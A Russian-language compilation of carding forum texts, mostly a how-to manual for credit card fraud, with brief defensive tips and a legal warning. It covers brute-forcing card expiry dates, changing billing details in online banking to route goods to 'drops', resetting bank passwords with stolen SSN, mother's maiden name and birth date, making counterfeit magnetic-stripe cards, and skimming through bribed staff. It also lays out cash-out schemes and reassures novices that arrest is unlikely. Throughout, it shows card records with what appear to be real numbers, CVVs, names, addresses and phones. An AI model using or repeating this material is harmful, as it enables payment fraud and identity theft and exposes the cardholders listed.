Кстати, если клиент (то есть ты) сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней. А в «Альфа Банк Экспресс» программное обеспечение вообще выдается пользователям бесплатно (судя по всему, оно просто входит в стоимость подключения к услуге). Отсюда вывод – русские банки самые банковые банки в мире! У американцев нет таких бонусов. И при этом, у них в большинстве случаев просто ужасная система авторизации. Не веришь? Я готов доказать. Для примера возьмем банк Калифорнии и CityBank. В СитиБанке от тебя требуется пин-код карты. В продаже можно легко найти или вытрейдить у кого-либо карты с пин-кодом. В банке Калифорнии необходим всего лишь номер карты и пароль. А в случае утери пин-кода или ключа, тебе скажут что-нибудь вроде: «Спасение утопающих - дело рук самих утопающих» (сам потерял, сам и разбирайся). А за то, чтобы они взяли на себя обязательство найти кардера, тебе придется отвалить им определенный процент от вклада или просто заплатить кучу денег. Вот такие «американские банки». Пожалуй, это один из тех немногих случаев, когда в России какая-то услуга организована реально лучше зарубежной. Именно РЕАЛЬНО, а не в соответствии с пословицей «что для русского халява – для американца 2 года тюремного заключения».
Так как же все-таки обезопасить свой вклад? Во-первых, никогда и нигде не называй свой пароль доступа, пин-код. Обращай внимание на протокол передачи данных. Если это http, то стоит задуматься, надо ли? Когда откроется страница-форма для ввода данных кредитной карты, посмотри на строку адреса, вернее – на ее конец. Если там ты видишь «https», то можно эту форму заполнить. Если нет, то уходи с этого сайта. Это относится и к интернет-магазинам. Более 40 процентов кредитных карт добываются кардерами методом замены страницы какого-либо сайта на свою, которая пишет номера и прочую информацию, введенную обладателем карты, в лог. Остальные методы защиты стандартны. Пользоваться антивирусной программой, фаерволом, не открывать вложения из непонятных писем, не сообщать друзьям, а тем более незнакомым людям, информацию о своей кредитной карте/банковском аккаунте.
Обзор онлайн-банка
Самое время рассмотреть реальный пример онлайн-банка. Это будет ТПСБанк (г. Томск).
Вот как истолковывают менеджеры банка понятие «интернет-банк»:
«Интернет-банк - это новая компьютерная система проведения электронных платежей через глобальную сеть Internet, которая позволит вам с максимальной скоростью и надежностью осуществлять платежи в рублях и иностранной валюте из любой точки земного шара через наш банк, а также получать выписки по своим счетам и обмениваться сообщениями с сотрудниками банка, экономя при этом массу времени. Все, что вам необходимо иметь при себе - это дискета с секретным ключом и доступ к интернету. Такая система должна стать основной формой общения клиента с банком в области расчетного обслуживания». Так-так, значит, в этом банке используется система защиты с помощью ключа на дискетке. Ну что ж, хороший вариант. При регистрации (офлайновой, в реальном банке) пользователя подводят к компьютеру, он жмет на кнопку в генераторе, создавая таким образом ключ. Ключ записывается в базу данных напротив логина и пароля. То есть, пользователь сначала логинится, а потом уже использует ключ. Логин и пароль этим ключом не шифруются. Ключ лежит в базе, и вся информация, поступающая от пользователя, сначала поступает на сервер зашифрованной, там берется ключ, соответствующий этому пользователю, и информация декодируется.
Вот что можно делать, используя услугу «Онлайн-банк» компании «ТПСБанк»:
Отправлять в банк все виды финансовых документов, включая платежные поручения, и осуществлять валютные переводы.
Получать из банка выписки по своим счетам за любой период с момента начала работы счета.
Осуществлять контроль над текущим состоянием документов в банке.
Обмениваться сообщениями с сотрудниками банка.
Для регистрации нам необходимо:
Открыть счет в ОАО "Томскпромстройбанк" (если нет счета).
Провести предварительную регистрацию с помощью системы "интернет-банк", сгенерировать и зарегистрировать ключи ЭЦП клиента.
Получить сертификат открытого ключа клиента, распечатать и заверить его круглой печатью и подписями ответственных лиц, образцы которых содержатся в банковской карточке образцов подписей
Загрузить бланк договора на обслуживание в системе "интернет-банк" и заполнить его.
Заключить договор на обслуживание в системе "интернет-банк" и произвести окончательную регистрацию в банке (при наличии распечатанного сертификата).
Примечание: информация о банке взята с его сайта и автором не изменялась.
Хочу представить твоему вниманию еще один банк, под названием «О.В.К. Банк». Он просто поразил меня своим феноменальным легкомыслием. Для авторизации надо знать ТОЛЬКО номер кредитки и expiration date (дата окончания действия кредитной карты). На худой конец - только номер. Пробрутфорсить дату окончания не составит труда. Ведь в этом году максимальный срок действия карты – приблизительно до 2010 года. Таким образом, имея 12 месяцев в каждом году, мы получаем 120 комбинаций. Такое можно подобрать и руками, без помощи специального софта.
Немного о кардинге
Если ты в курсе, что такое кардинг, и интересуешься этим, то тебе должно быть известно, что кардеры очень часто ищут карты с онлайн-доступом и покупают их за бешеные деньги. Могу сказать, что дело того стоит. Кто пробовал заниматься кардингом, наверное, заметил, что часто бывает так: закажешь что-нибудь вещественное, на себя или на дропа по левой креде, а оно не приходит. А дело в том, что, по умолчанию, товар может отправляться только на биллинг-адрес, то есть на адрес владельца карты. Но ведь другие как-то заказывают! А делают они это так: заходят в онлайн-банкинг и изменяют реквизиты владельца счета (соответственно и креды) на реквизиты дропа. Некоторые банки позволяют через онлайн изменить даже ФАМИЛИЮ И ИМЯ владельца. Но это в большинстве случаев не обязательно. И если заказ проверяют в e-shop’e, то звонят в банк-эмитент кредитки, по которой сделан заказ. Им, естественно, говорят, что у хозяина креды адрес и телефон действительно такие, какие ты ввел. Магазин примет это к сведению и может еще раз позвонить, но уже не в банк, а дропу, который подтвердит заказ.
Но если ты не сменил биллинг-адрес кредитки в банке, и, позвонив туда, менеджеры магазина узнают, что это адрес не настоящего владельца креды, то они легко узнают его реальный телефон (который ты не изменил). После чего позвонят ему и спросят, заказывал ли он для Васисуалия Пупкина двухмоторную яхту. Если нет… то ему сообщают реквизиты дропа со всеми вытекающими последствиями.
Как ты заметил, для доступа к банковскому аккаунту обычно нужен номер кредитной карты и пароль, реже имя пользователя и пароль. При регистрации обычно указываются конфиденциальные данные пользователя. К примеру, девичья фамилия матери, номер страхового полиса, дата рождения и.т.д. Но достать кредитки с этой информацией не составляет труда. Как хакеры это делают, я не знаю, возможно, с помощью троянов, или взламывают эти самые онлайн-банки. Но пароль… если у тебя есть кредитка со всей инфой (SSN, MMN, DOB), можно попытать счастье и попробовать восстановить пароль. Некоторые банки предлагают восстановить пароль прямо в онлайне, но в большинстве случаев придется звонить в службу поддержки банка, где надо будет называть всю эту информацию. Если ты все скажешь правильно, тебе поменяют пароль.
Сылки по теме:
www.internetfinance.ru - сайт о финансах, я узнал из него много нового и полезного
www.citybank.com - ситибанк (буржуйский)
www.tpsbank.tomsk.ru - Томский банк ТПСБанк
Если клиент сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней.
Что такое СС
СС это Credit card.
VISA
Eurocard/Mastercard
JCB
DinersClub International
DinersClub valid in Russia
American Express
Visa Electron
Eurocard/Mastercard Cirrus/Maestro
VISA
- на карте VISA после даты окончания действия карты изображен значок “V” такой же как первая буква логотипа;
- Начальная цифра Visa – 4
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
Eurocard/Mastercard
- на карте Eurocard/Mastercard после даты окончания действия карты изображен значок MC
- Начальная цифра Eurocard/Mastercard - 5
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
JCB
- на карте JCB после даты окончания действия карты изображен значок "J" или “звездочка JCB”
- Начальная цифра JCB - 35
DinersClub
- на карте DinersClub после даты окончания действия карты изображен логотип круг с вертикальной чертой
- Начальные цифры DinersClub - 30, 36, 38, 39
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
- На лицевой стороне справа две буквы секретного кода
American Express
- Начальная цифра AmericanExpress - 37
- существуют карты Centurion, Corporate, Optima и Hertz
Необходимые Вам данные для кардинга:
CC number
CVC
EXP
First name
Last name
Street, house number
Sity
Country
State
Zip
Phone number
Credit card - это кредитная карта, у нас же имеется необходимая инфа с неё, она же называется сс, картон, картошка, карты и т.д
Давайте разберемся как примерно выглядят сс инфо трёх самых необходимых и популярных стран. (USA/UK/DE)
Мы не разбираем full info, т.е. ничего дополнительного, только основное.
USA (United States):
5256502253097617 - Сам номер сс (credit card num)
0910 - exp (срок действия карты) 09 месяц 10 год
502 - cvv (секретный код)
Jorge Bailon - имя хранителя карты (cardholder name)
15760 SW 69 ld - улица (street)
miami - город (city)
FL - штат (state)
33193 - зип код (zip code)
US - страна (coutry)
3055051991 - номер телефона (phone num)
VISA - тип карты (type)
К USA сс еще можно добавить SSN, DL, MMN, DOB, credit report и т.д. и т.п.
UK (United Kingdom):
5178057252945584 - cc num
1211 - exp
849 - cvv
Feiyue Ma - cardholder name
8 Wilberforce Road - street
Norwich - city
NFK - это королевство, штат, графство и т.д (county)
GB - country
NR5 8ND - zip code
07883894260 - phone num
Master Card - type
В ЮК как правило берут только DOB как дополнительное инфо. Еще иногда sort code (код сортировки сс), эта инфа нужна
для обхода вбв (verified by visa).
DE (Deutschland):
4344990165183012 - cc num
1112 - exp
830 - cvv
Visa - type
Alexander Reitzenstein - cardholder name
Wichertstrase 38a - street
Berlin - city
10439 - zip-code
030/20055321 - phone num
Deutschland - coutry
В Германии как правило при вбв спрашивает DOB, штатов нету.
Первое, что начинающий кардер должен изучить, так это конечно же информацию о кредитных картах, проще говоря картон / СС.
Итак, приступим.
Первым делом нам нужно найти картон. Самый простой вариант это купить его у продавца. При покупки вы получите картон примерно в таком формате:
4306651004564350 | 10/10 | 826 | Richard Lang | 56 Groveview Cir | Rochester | 14612| NY | USA | 661-298-0881
(Формат у каждого продавца бывает разным)
• 4306651004564350 - Номер кредитной карты.
• 10/10 ( 10 месяц / 10 год,) - Дата окончания действия карты.
• 826 - Защитный код карты CVV/CVV2
• Richard Lang – First и Last Name (??мя, Фамилия)
• 56 Groveview Cir – Адрес
• Rochester – Город
• 14612 – Zip code (зип)
• NY (New York) – Штат
• USA – Страна
• 661-298-0881 - Телефон
За дополнительные $ вы можете пробить дополнительную информацию:
Данные пункты пробиваются в основном для создания Enroll'a, поэтому если вас интересует просто вбив, то они вам скорее всего не понадобятся.
• DOB - дата рождения
• SSN - номер социального страхования
• MMN - Mothers Middle Name (отчество матери, так сказать)
Теперь немного конкретизации, касательно каждого вида карты:
Visa
• Номера кредиток Visa начинаются с цифры 4
• Имеется защита под названием Verified by Visa (VBV)
• 3х значный CVV код
Verified by Visa - уникальная услуга, в которой личный пароль или идентификационная информация используются для защиты номеров карт Visa от несанкционированного использования. Проще говоря у холдера есть код который он должен будет ввести при покупки чего либо.
MasterCard
• Номера кредиток MasterCard начинаются с цифры 5
• Имеется защита под названием MasterCard SecureCode (MCSC)
• 3х значный CVV код
MasterCard SecureCode - принцип работы тот же, что и у VBV.
American Express
• Номера кредиток American Express начинаются с цифры 3
• 4х значный CVV код
Discover
• Номера кредиток Discover начинаются с цифры 6
• 3х значный CVV код
Как определить Zip / Штат / Телефон
1) Заходим на сайт zipcodes.addresses.com/zip_code_lookup.php
(Например, у нас есть город и зип, как определить штат?|Summerville|30747|United States
2) Вбивем город в поле City и выбираем первый попавшийся штат. (допустим это будет GA)
3) Далее нам выводится результат, где мы сверяем Zip тот что указан в картоне и где указано поле ZIP COD на сайте.
4) Как мы видим Зипы совпали а значит наш штат это GA
5) Так же в поле AREA CODE указаны первые три цифры телефона штата
Bin - первые 6-ть цифр в номере кредитной карты, индификатор банка который выдал карту.
Например карта 4306651004564350, где 430665 - номер банка который выдал карту:
Wescom C.U. DEBIT CLASSIC USA Pasadena California CA
сайтик для пробива:
Вот тут ещё на крайняк:
4128004082601569 - Это НОМЕР самой карты!
После этого видно что написано VISA (выбираем VISA)
09|2014 - Это месяц и год окончания карты в основном он пишется так 0914 !
|Catherine|Chandler| - Это имя и фамилия кардхолдера (владельца карты) !
|952| - Это код карты CVV
|308 Swagg Cove Rd.| - Это адрес
|Wedowee| - Это город
|AL| - Это штат
|36278| - индекс или post code
|USA| - естественно страна карты
Остальное не пригадится, но для пояснения:
|7702965721| - номер телефона владельца(вбивайте скайп угорайте над ними)
|[email protected]| - Это e-mail владельца карты (кардхолдер)
COUNTRY - Это страна
FIRST NAME - Имя
LAST NAME - Фамилия
STREET ADDRESS - Адрес
CITY - Город
STATE / PROVINCE - Область или штат в зависимости где проживаете!
ZIP CODE - Индекс
PHONE - Номер телефона , ну тут бред пишите )
EMAIL - Ваш e-mail
Теперь ещё по поводу карт:
На 3 начинается - AMEX (American Express)
На 4 начинается - VISA
На 5 начинается - MasterCard
На 6 начинается - Discover
Шифрование Jabber, ICQ и прочих програм
Если вас заботит проблема перехвата сообщений злобным админом и другими спецслужбами то выход Simp Lite-ICQ-AIM, который поддерживает MSN Messenger, Yahoo! Messenger, ICQ/AOL Instant Messenger (AIM), Jabber/Google Talk.
Поддерживается шифрование сообщений в сетях MSN Messenger, AIM, ICQ, Yahoo! и зашифрованная передача файлов в MSN Messenger и ICQ.
Для шифрования самих сообщений и файлов используются симметричные шифры AES, 3DES, CAST и Twofish c длиной ключа 128 бит.
Для безопасной передачи симметричного ключа шифруемой сессии и аутентификации собеседников используются ассимметричные шифры RSA 2048-4096 bit, ElGamal/DSA 1024/2048 bit, Elliptic curve over GF(p) 256/521 bit.
Программа работает с IM-клиентами в двух режимах:
1) Эмуляции IM-cервера - клиент отправляет сообщения на локальный сервер, там они шифруются и отправляются на настоящий сервер IM-cети. Если у Вас супер-пупер нестандартный клиент, то его возможности могут быть ограничены возможностями локального сервера. 2) Эмуляции прокси SOCKS4 - рекомендуемый режим. Клиент настраивается для работы через локальный SOCKS4 прокси на котором все и будет шифроваться.
Стандартные клиенты программа сама может настроить для работы через себя, а в альтернативных клиентах сервер надо будет прописать руками.
Сама программа так же поддерживает работу через SOCKS4/5/HTTP прокси, так что прямое подключение к интернету для нее не обязательно.
Естественно для того, чтобы шифрование работало необходимо, чтобы у всех участников беседы IM-клиенты работали через эту программу. Для нетребовательных домашних пользователей есть бесплатные Lite версии для каждого протокола. Для корпоративных пользователей и домашних с амбициями - версия Pro.
Настройка программы icq
1. сгенерируйте по 1 ключу каждого вида(длины)
2. пропишите в асе сокс 4 или 5 с IP 127.0.0.1 и портом 15190
3. запустите асю, если она загрузилась значит работает
Настройка программы jabber
1. сгенерируйте по 1 ключу каждого вида(длины)
2. пропишите в jabber сокс 4 или 5 с IP 127.0.0.1 и портом 15222
3. запустите жабу, если она загрузилась значит работает
скачать Simp Lite-ICQ-AIM
скачать SimpLite-Jabber
Также для пользователей QIP имеется специальный плагин Xcrypt
Возможности:
- обмен ключами на основе ассимметричного алгоритма RSA с регулируемой длиной ключа
- шифрование симметричными алгоритмами в связке AES-Twofish-Serpent
- автоматическая расшифровка входящих сообщений, если зашифрованы и пароль сходится (поддержка оффлайн сообщений)
- генерация собственного формата хеша из пароля пользователя
- экспериментальным путем установлено, что отправить можно сообщение длиной примерно 1200 символов максимум, т.к. объем пересылаемого текста увеличивается в 2-3 раза
- возможность устанавливать различные пароли разным контактам
- не требуется никаких дополнительных программ
- простое и удобное включение/выключение шифрования
Как пользоваться:
- скачиваете Xcrypt
- устанавливаете (копируете в папку plugins rypt)
- запускаете qip, пользуетесь
Включение/выключение шифрования, а также установка пароля осуществляется кнопками под аватаром собеседника в окне чата.
Secure IM - плагин для для шифрование переписки Miranda
Плагин обладает ресурсными возможностями шифровать Ваши сообщения на AES192 или PGP/GPG.
Поддержите Unicode, tabSRMM и Clist
Для работы плагина требуется служба Crypto++
скачать сервис Crypto
скачать плагин SecureIM
RatCrypt - плагин для шифрование переписки RnQ
Шифрование переписки между 2-мя RnQ с установленными плагинами
- Алгоритн шифрования - AES 256bit
- Шифруется с помощью пароля или файла с ключом
скачать плагин RatCrypt
SecuredRQ - Плагин шифрования для &RQ
Описание:
Плагин предназначен для шифрования передаваемых сообщений по протоколу Oscar. Исходящие сообщения шифруются посредством алгоритма RSA, 128-битным ключем. Кодирование/декодирование производится при помощи публичных/приватных ключей.
Возможности:
— Шифрование сообщений 128-битным ключем посредством алгоритма RSA.
— Настройка шаблона шифрованых сообщений
— Всплывающие окна в области SysTray
— Смайл, отмечающий зашифрованные сообщения
Требования:
&RQ by Shyr не ниже версии 0.9.7.2.
Также проверена работа плагина на R&Q 1014 by Rapid.
Примечания:
Для работы SecuredRQ необходимо наличие плагина на обеих сторонах.
Плагин НЕ СОВМЕСТИМ с SecureIM.
скачать плагин SecuredRQ
OTR - плагин для шифрование переписки Pidgin
Off-The-Record (OTR) сообщениями позволяет проводить частные разговоры по мгновенными сообщениями, обеспечивая:
- шифрование (никто не сможет прочесть сообщения),
- аутентификацию (возможность удостовериться, что собеседник – тот, за кого он себя выдает),
- анонимность (после того, как разговор окончен, полученные сообщения нельзя однозначно связать с личностями собеседников),
- сохранность прежних сообщений (если ваш закрытый ключ оказался в чужих руках, можно не беспокоиться за сохранность сообщений).
Установив Pidgin, вы сохраняете и список контактов (если он у вас уже есть), и способность связываться с другими пользователями; важно лишь, чтобы все вы обменивались информацией по одному протоколу (например, ICQ).
Сначала нужно установить Pidgin, затем http://andrq.org/forum/viewtopic.php?t=1887 ОТР
poplinux.ru
Статья для Параноиков))) всем спасибо!
P.S. Любой софт который не получается скачать... можно нагуглить и скачать!
Чем живут реальные кардеры?
Оружие, выстрелы, кровь - все это еще в недалеком прошлом являлось непременным атрибутом ограблений банков и инкассаторов. С появлением кредитных карт и развитием кардинга все изменилось. Теперь не нужно врываться в банк с автоматом в руках и требовать наличные. Достаточно получить доступ к банковскому аккаунту кардхолдера и вывести его деньги со счета. Сделать это можно несколькими способами, одним из которых являются поддельные кредитки, или «белый пластик».
Стандартизация пластиковых карт
Начинать работать, не имея понятия о том, что собой представляют пластиковые карты, невозможно. Поэтому - обо всем по порядку. Ты, наверное, знаешь, что карточки бывают разные (с магнитной полосой, чиповые, БСК, и т.д.). В общем виде их можно классифицировать по методам записи и обработки данных:
Реального кардера обычно интересуют магнитные и чиповые карты, так как именно они используются платежными системами. Размер карточек носит название ID-1 и составляет 85,6х53,98х0,76 мм. Лицевая сторона карты - аверс, на ней могут располагаться чип, информация о банке-эмитенте, номер карты и логотип платежной системы. На обратной стороне – реверсе - обычно находится магнитная полоса и полоса для подписи. Зоны тиснения информации также закреплены стандартами. Например, строка с идентификационным номером располагается на уровне 20 мм от нижнего края карты и не может превышать 19 символов. Под ней находится зона для нанесения данных кардхолдера (владельца карточки) и Expire Date (срока окончания действия карты). Кроме тиснения, применяется термопечать - печать на карте методом термодиффузии (при нанесении логотипов). Информацию, зафиксированную таким образом, практически невозможно стереть.
Коротко о чиповых картах
Было бы несправедливо не упомянуть в статье о чиповых картах, так как они широко используются российскими банками. Такие карты делятся на 2 типа:
контактные чиповые карты;
Бесконтактные чиповые карты
Контактные карты содержат на аверсе (лицевой стороне) «карман» для расположения чипа. На сам чип-модуль наносится специальный клей, после чего микросхема вклеивается в «карман». Чип представляет собой микрокомпьютер, который обрабатывает поступающие команды (поэтому такие карты и называют смарт-картами). В нем реализована защищенная область памяти, информация в которой кодируется секретными ключами. Технология производства чипов постоянно совершенствуется. Что касается БСК (бесконтактных чиповых карт), то внутри по их периметру расположена антенна, которая позволяет картам обмениваться данными с картридером при помощи радиочастот. Сразу скажу, что в статье я не буду описывать способы подделки чиповых карт, так как основная мишень реал-кардинга - магнитные карты.
Тайна магнитной полосы
Надо отметить, что 90% международных платежных систем используют карты с магнитной полосой. На них я и остановлюсь подробнее. Магнитная полоса располагается на расстоянии 5,5 мм от верхнего края обратной стороны карты и может содержать 2-3 дорожки. Ширина полосы зависит от числа дорожек и составляет 6,4 мм при двух дорожках и 10,3 мм при трех. Как ты понял, вся информация, необходимая для совершения финансовых операций, находится на магнитной полосе.
Теперь рассмотрим каждую из трех дорожек. Первая дорожка включает буквенно-цифровую информацию. На ней помещается до 79 символов. Дорожка содержит следующие данные:
На второй дорожке располагается только цифровая информация, кодируемая двоично-десятичным кодом. Всего на дорожке может быть до 39 символов. Вторая дорожка дублирует информацию первой, за исключением данных о кардхолдере.
Третья дорожка является необязательной. Она содержит цифровую информацию и кодируется аналогично первой дорожке. Максимальное число символов на дорожке - 107.
Ты спросишь: «Зачем нам все это нужно?» Ответ прост: реальный кардер может самостоятельно записывать данные на дорожки магнитной карты. Но об этом далее.
Кардинг, или делаем деньги
Как говорится, перейдем от теории к практике . Все действия реального кардера можно распределить в соответствии со следующим планом:
Начну с первого пункта. Здесь кардеру необходимо определиться с расходными материалами. Если он собирается налить деньги через банкоматы, то ему достаточно белого пластика с магнитной полоской, а если планирует заняться шопингом, то ему уже потребуется качественно сделанная кредитка с элементами термопечати и тиснения. Второй вариант я рассмотрю подробнее, так как, хотя он и связан с трудоемкий процессом изготовления, но на выходе предполагает полноценный, готовый к употреблению продукт =). Сразу скажу, что для открытия собственной «лаборатории» по производству картона (кредитных карт) преступнику нужны будут определенные денежные вложения, которые, впрочем, окупятся при умелом подходе.
Первая жизненно необходимая вещь - это пластик с впаянной магнитной полосой. Приобрести его сейчас не проблема. Наиболее распространенный тип пластика - CR-80.
Также для грязных дел необходим качественный принтер, с помощью которого на пластик будут наноситься печатный текст и эмблемы. Выбору принтера реальный кардер уделяет особое внимание, так как от него напрямую зависит внешний вид картонки. В качестве примера назову Eltron P210i, который используется для печати удостоверений, пропусков и т.д. Он подходит для односторонней печати без полей и почти идеально штампует карты с разрешением 300 dpi. Также Eltron P210i позволяет наносить штрихкоды, фотографии, графику и текст. Правда стоит он около $2000, но это не помеха, так как все затраты начинающего кардера, как было сказано выше, окупаемы.
Следующий шаг – «выдавливание» на карте инициалов кардхолдеров, банка-эмитента, номера карты и т.д. Для этого существует эмбоссер. Один из вариантов - Matica Z1, имеющий компактный размер и способный выпускать до 600 карт в сутки. Стоимость этого агрегата составляет порядка $3500. Для того чтобы окрасить эмбоссированные символы на карте, нужен типпер. Наиболее характерный выбор - Matica Z Tipper, который всего за несколько секунд придаст картонке подобающий вид. Цена подобного типпера колеблется в пределах $1600. Кроме эмбоссирования, типпинга и печати, на карту требуется нанести голограмму и полосу для подписи. Последняя, сделанная из особой бумаги, клеится на обратной стороне креды. На ней обязательно ставится подпись (по идее, владельца креды =)), без которой карта считается недействительной. Что касается голограммы, то тут дело обстоит несколько сложнее. Оригинальную голограмму практически невозможно содрать с поверхности кредитки. С большинства же поддельных картонок отклеить голограмму не составляет труда, поэтому кардеры уделяют пристальное внимание этой проблеме.
Так, о работе с пластиком я рассказал. Но от просто красиво окрашенных карт толку мало, поэтому перейдем ко второму этапу - записи данных на магнитную полосу. Для этого кардер приобретает энкодер - устройство для чтения и записи магнитной полосы карт. Энкодеры могут записывать 2 вида карт - high и low coercivity (высокой и низкой намагниченности). Лучше тот, который «понимает» любые карты.
Энкодеры также делятся на 2 типа в зависимости от количества записываемых дорожек (треков). Не старайся выбрать именно тот энкодер, который записывает все 3 дорожки, так как третий трек не используется ни POS-терминалами (за исключением редких случаев), ни банкоматами. Основную роль здесь играет вторая дорожка. С ее помощью можно вручную создать первый трек на основе данных, имеющихся во втором. Обычно используются именно эти две дорожки (первая и вторая). Третий трек, как правило, располагает на себе какую-либо дополнительную информацию, не имеющую принципиального значения (система скидок, бонусные очки владельца креды и т.д.).
Из популярных энкодеров могу отметить AMC C722 и MSR206. AMC C722 записывает и читает первые две дорожки; он прекрасно показал себя в «боевых» условиях. По цене он обойдется тебе в $800. После выбора и покупки энкодера преступнику необходимо раздобыть дампы, которые записываются на магнитные полосы картонок. Здесь есть 2 варианта:
кардер покупает дампы у селлеров (людей, торгующих дампами кред);
кардер самостоятельно добывает дампы.
С первым вариантом, думаю, ясно. Берется некая сумма вмз/еголд/etc, ищется человек/сервис по продаже дампов, и происходит закупка. А вот со вторым способом все намного интереснее. Здесь необходимо проявить смекалку и каким-то образом считать скимером (устройством для чтения данных с магнитной полосы) кредитку кардхолдера. Известны случаи сговора с официантами в кафе/ресторане (гостиничными менеджерами), которые за определенную плату считывали скимером дампы с кредитных карт посетителей и передавали их киберпреступнику. Но обычно кардеры закупаются у селлеров и не парятся по этому вопросу. Получив дампы, они подрубают к компу энкодер, ставят нужный софт (который иногда идет в комплекте с энкодером) и закатывают очередную картонку.
Собираем урожай
После всех описанных выше действий преступники приступают к третьему, самому ответственному пункту плана - обналичиванию или шопингу. Здесь есть свои нюансы. Если известен пин-код, то наиболее удобным способом является поход к банкомату. Но если человек закатывал на креду дамп, а пина (PIN) от карточки нет, то ситуация усложняется. Вариант с обналом в банкомате отпадает сразу, так как там ввод пин-кода является обязательным условием. Остается шопинг. Причем кардер ищет только те магазины, в которых установлены POS-терминалы, не требующие пина. Отличить их можно по отсутствию клавиатуры для набора пин-кода. Но, как показывает практика, в российских магазинах они встречаются нечасто. Правда до сих пор работает система с выездом за границу для последующего отоваривания в буржуйских шопах. Но для ее реализации нужны документы, билеты и отработанные схемы. Вообще говоря, такой шопинг является экстремальным в прямом смысле этого слова. Ведь неизвестно, что может ожидать человека в случае неудачной транзакции: удивление кассира, вызов милиции или полиции (за рубежом), звонок в банк и т.д. Как ни крути, но все варианты просчитать невозможно.
Сижу за решеткой в темнице сырой...
Как ты понял из моей статьи, кардинг связан не только материальными вложениями, но и с колоссальным риском. В последнее время участились случаи успешного задержания кардеров сотрудниками МВД и ФСБ. Некоторые известные кардеры добровольно завершили свою деятельность. А тебе я советую и не начинать. Кардинг - это кривая дорога, и шансов, что она приведет тебя к чему-то хорошему в жизни, очень мало. Чтобы не быть голословным, напомню о статье 187 УК РФ «Изготовление или сбыт поддельных кредитных, либо расчетных карт и иных платежных документов». По этой статье реально получить от двух до шести лет (или от четырех до семи, при наличии организованной группы). Подумай на досуге, что тебе дороже: красивая, но короткая жизнь на воле или свобода. Я думаю, выбор очевиден - свобода дороже.
P.S. Спасибо что осилили и прочитали эту методичку-руководство по каржу. Пособие старенькое, но я его немного отредактировал. Надеюсь новичкам будет интересно и полезно почитать.
Желаю вам удачных и успешных вбивов каждый день!
1. Хочу все и сразу.
Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь все есть. Также статейка по общим понятиям по заливам есть.
2. Безопасность. Меня посадят.
Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.
Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.
3. Легкие деньги.
Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.
Предисловение. Куда можно вбить и как на этом заработать.
1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стаф есть в материалах.
2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.
3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.
4. Покер аккуанты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.
5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.
6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.
7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.
8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.
Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.
Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.
